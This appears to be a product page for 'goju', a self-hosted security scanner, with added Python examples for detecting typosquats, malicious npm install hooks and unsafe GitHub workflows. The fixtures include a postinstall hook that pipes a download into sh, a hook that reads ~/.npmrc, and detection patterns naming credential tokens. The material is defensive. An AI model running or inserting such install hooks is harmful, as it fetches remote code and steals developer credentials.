One agent across four fronts — static, dynamic, supply chain and regulatory. It watches the code you wrote and the code you didn't, on infrastructure you control. Nothing leaves the box.
curl -fsSL https://goju.app/install.sh | sh
Coming soon
goju replaces a drawer full of tools with a single self-hosted agent. Three fronts are deep, built-in and run fully offline; the fourth orchestrates the industry-standard engines against your running apps.
Your code & config, at rest — SAST (Semgrep, gosec, optional LLM review), secrets in the tree and across git history, IaC misconfiguration, PII / cardholder data, and OSS license policy.
(built-in · offline)
Your running apps — OWASP ZAP and Nuclei driven through goju: baseline, OpenAPI and authenticated scans, with automatic environment detection. Industry engines, run on your infrastructure.
(ZAP · Nuclei · your infra)
The code you didn't write — malicious install hooks, typosquats, transitive worms, CI/CD attacks and AI/ML model artifacts, matched against ~227k known-malicious packages, fully offline.
(goju's deepest front →)
Evidence, not questionnaires — DORA, NIS2, EU CRA, SOC 2, GDPR and PCI-DSS, scored from your real scan data with gaps, recommendations, reporting deadlines and role-based cockpits.
(6 frameworks · scored)
CVE scanners tell you about yesterday's known vulnerabilities. goju also detects the actual compromise patterns — statically, before they reach a database — and we publish the numbers.
postinstall/preinstall scripts that exfiltrate credentials, fetch payloads or propagate worms — the Shai-Hulud / event-stream / ua-parser-js pattern, across 14 manifest formats.
(behavior · BHV-*)
The full OSV malicious set — npm, PyPI, RubyGems, crates, Go, Maven, Packagist — baked into the binary and matched offline. No lookup call, works fully air-gapped. Refreshed per release.
(malpkg · 227k offline DB)
Damerau-Levenshtein edit-distance plus Cyrillic/Greek homoglyph detection across npm, PyPI, Go, Cargo and Composer. Catches lodahs, requets, Cyrillic-а-in-react.
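The typosquat check above, written out as an added example (this is not goju's code; it shows the technique the page names). The Damerau-Levenshtein implementation is the optimal-string-alignment variant, so a single adjacent swap such as lodahs/lodash costs 1; the homoglyph table and the list of popular package names are constructed for the example and a real scanner would ship far larger ones.

```python
from typing import Optional

# Constructed allowlist of well-known package names. A real scanner ships a much larger
# per-ecosystem list; the logic below does not depend on its size.
POPULAR = {"lodash", "react", "requests", "express", "numpy", "axios", "flask", "vue"}

# Cyrillic and Greek letters that render identically to Latin ones (constructed subset).
HOMOGLYPHS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u03b1": "a", "\u03bf": "o", "\u03bd": "v", "\u03c1": "p", "\u03c4": "t",
}


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insertions, deletions, substitutions and
    swaps of two adjacent characters each cost 1, so 'lodahs' -> 'lodash' is 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent transposition
    return d[len(a)][len(b)]


def fold_homoglyphs(name: str) -> str:
    """Map look-alike non-Latin letters onto their Latin counterparts."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in name)


def check_package(name: str, popular=POPULAR) -> Optional[dict]:
    """Return a finding for a suspicious dependency name, or None if it looks legitimate."""
    lowered = name.lower()
    folded = fold_homoglyphs(lowered)
    if folded != lowered and folded in popular:
        # Visually identical to a popular package once homoglyphs are folded.
        return {"package": name, "target": folded, "kind": "homoglyph"}
    if folded in popular:
        return None  # the real package itself
    if len(folded) < 4:
        return None  # very short names sit within distance 1 of too many real ones
    for target in sorted(popular):
        if damerau_levenshtein(folded, target) == 1:
            return {"package": name, "target": target, "kind": "typosquat"}
    return None


def scan_manifest(dependencies, popular=POPULAR) -> list:
    """Apply check_package to every declared dependency and collect the findings."""
    return [f for f in (check_package(dep, popular) for dep in dependencies) if f]


if __name__ == "__main__":
    # Constructed dependency list: two typos, one Cyrillic-а-in-react, two legitimate names.
    for finding in scan_manifest(["lodahs", "requets", "re\u0430ct", "express", "numpy"]):
        print(finding)
```

The length guard matters in practice: a three-letter name is within one edit of dozens of real packages, so distance alone would drown a team in false positives; a production rule set also weighs download counts and package age, which this example leaves out.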
Most scanners stop at your top-level manifest. goju walks node_modules, .venv and vendor/ and applies the same rules to every installed package — where the worm actually lives.
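An added example of the two points above (install-hook behaviour rules and walking nested node_modules), not goju's own code: it writes a constructed project tree into a temporary directory, then applies the same regex rules to every package.json it finds, however deep. The rule IDs are made up for this example; the page only says goju labels behaviour findings BHV-*. The sample hooks are never executed and point at a reserved .invalid host.

```python
import json
import os
import re
import tempfile

# Behaviour rules over install-time scripts. IDs are constructed for this example.
RULES = [
    ("BHV-PIPE-TO-SHELL", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("BHV-INLINE-NODE", re.compile(r"\bnode\s+-e\b")),
    ("BHV-BASE64-DECODE", re.compile(r"base64\s+(-d|--decode)\b")),
    ("BHV-CRED-ACCESS", re.compile(r"\.npmrc|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY")),
    ("BHV-SELF-PUBLISH", re.compile(r"\bnpm\s+publish\b")),
]
HOOKS = ("preinstall", "install", "postinstall", "prepare")


def inspect_scripts(scripts: dict, path: str) -> list:
    """Match every install-time hook in one package.json against RULES."""
    findings = []
    for hook in HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for rule_id, pattern in RULES:
            if pattern.search(cmd):
                findings.append({"path": path, "script": hook, "rule": rule_id, "command": cmd})
    return findings


def scan_tree(root: str) -> list:
    """Walk the whole tree, nested node_modules included, so transitive packages get
    exactly the same rules as the top-level manifest."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        full = os.path.join(dirpath, "package.json")
        try:
            with open(full, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON; a real tool would report this as well
        rel = os.path.relpath(full, root).replace(os.sep, "/")
        findings.extend(inspect_scripts(manifest.get("scripts") or {}, rel))
    return sorted(findings, key=lambda f: f["path"])  # stable: rule order kept per file


def build_sample_tree(root: str) -> None:
    """Write a constructed project: a clean app, a clean native dependency, and two
    suspicious transitive packages. Nothing in these manifests is ever run."""
    sample = {
        "package.json": {"name": "app", "scripts": {"build": "tsc", "postinstall": "node scripts/setup.js"}},
        "node_modules/native-dep/package.json": {"name": "native-dep", "scripts": {"install": "node-gyp rebuild"}},
        "node_modules/left-util/package.json": {
            "name": "left-util",
            "scripts": {"preinstall": "node -e \"require('fs').readFileSync(require('os').homedir()+'/.npmrc','utf8')\""},
        },
        "node_modules/native-dep/node_modules/tiny-colors/package.json": {
            "name": "tiny-colors",
            "scripts": {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"},
        },
    }
    for rel, manifest in sample.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)


def demo() -> list:
    """Build the constructed tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["rule"], finding["path"], finding["script"])
```

The point of the walk is the third manifest: tiny-colors sits two levels down, exactly where a top-level-only scanner never looks. The regexes are deliberately narrow; widening them (encoded payloads, scripts that write into sibling packages) is where the real engineering effort in a behaviour rule set goes.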
Unpinned GitHub Actions, pull_request_target with checkout (the tj-actions pattern), script injection and secret exposure on PR triggers.
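An added, line-based checker for three of the workflow problems named above (unpinned actions, pull_request_target combined with a checkout of the PR head, and PR-controlled fields interpolated into steps); it is not goju's code and does not parse YAML, so it is illustrative rather than complete. The workflow it scans is constructed for the example, and the 40-character SHA in it is a placeholder, not a real commit.

```python
import re

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
REF_RE = re.compile(r"^\s*ref:\s*(.+?)\s*$")
STEP_START_RE = re.compile(r"^\s*-\s")
# Fields an external contributor controls; putting them into run: is the classic injection.
UNTRUSTED_RE = re.compile(
    r"github\.(event\.pull_request\.(title|body|head\.ref|head\.repo\.\w+)"
    r"|head_ref|event\.(issue|comment|review|discussion)\.(title|body))"
)
PR_HEAD_RE = re.compile(r"pull_request\.head")


def scan_workflow(text: str) -> list:
    """Return findings as dicts with rule, 1-based line and a short detail."""
    lines = text.splitlines()
    uses_prt = any(re.search(r"\bpull_request_target\b", ln) for ln in lines)
    findings = []
    for i, line in enumerate(lines, 1):
        m = USES_RE.match(line)
        if m:
            spec = m.group(1)
            if not spec.startswith(("./", "docker://")):
                ref = spec.rsplit("@", 1)[1] if "@" in spec else ""
                if not SHA_RE.match(ref):  # tags and branches move; only a SHA is immutable
                    findings.append({"rule": "unpinned-action", "line": i, "detail": spec})
            if uses_prt and spec.startswith("actions/checkout"):
                # pull_request_target runs with base-repo secrets; checking out the PR head
                # then hands untrusted code those secrets. Look through this step for a ref:.
                for j in range(i, len(lines)):
                    if STEP_START_RE.match(lines[j]):
                        break
                    r = REF_RE.match(lines[j])
                    if r and PR_HEAD_RE.search(r.group(1)):
                        findings.append({"rule": "prt-checkout", "line": j + 1, "detail": r.group(1)})
                        break
        u = UNTRUSTED_RE.search(line)
        if u:
            findings.append({"rule": "script-injection", "line": i, "detail": u.group(0)})
    return findings


# Constructed workflow exhibiting all three problems; FAKESHA is replaced by a placeholder SHA.
_TEMPLATE = """name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@FAKESHA
        with:
          node-version: 20
      - name: greet
        run: echo "Checking ${{ github.event.pull_request.title }}"
"""
SAMPLE_WORKFLOW = _TEMPLATE.replace("FAKESHA", "a" * 40)


if __name__ == "__main__":
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print(f"{finding['rule']:18} line {finding['line']:3}  {finding['detail']}")
```

Note what the checker does and does not say: setup-node pinned to a full SHA is accepted, the checkout at v4 is not, and the ref: line is flagged only because the workflow also declares pull_request_target; the same checkout under a plain pull_request trigger gets no secrets and no finding.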
Real pickle-opcode disassembly over .pkl/.pt/.ckpt models catches code-execution payloads; OWASP-LLM-Top-10 app flaws and unpinned / typosquatted model references round it out.
Measured, not asserted — every release is scored against a labelled corpus (make bench), published in the repo.
If you scan with a cloud vendor, you're uploading your dependency tree — and often your source — to a third party. goju is one binary you run yourself. Same job, in many cases deeper, without the upload — and with the controls a regulated team needs.
(--fail-on-critical, SARIF out, and auto-fix PRs)
One line, no dependencies. The static, supply-chain and regulatory fronts work with zero setup; dynamic adds ZAP/Nuclei when you want it.
Point it at any project: goju supply-chain ./ — or goju scan --all for the full agent. No database, no account.
Add --fail-on-critical in CI, or goju serve for the dashboard, scheduled scans, auto-scan on push and auto-fix PRs.
One self-hosted binary. Static, dynamic, supply chain and regulatory. Your code never leaves the box.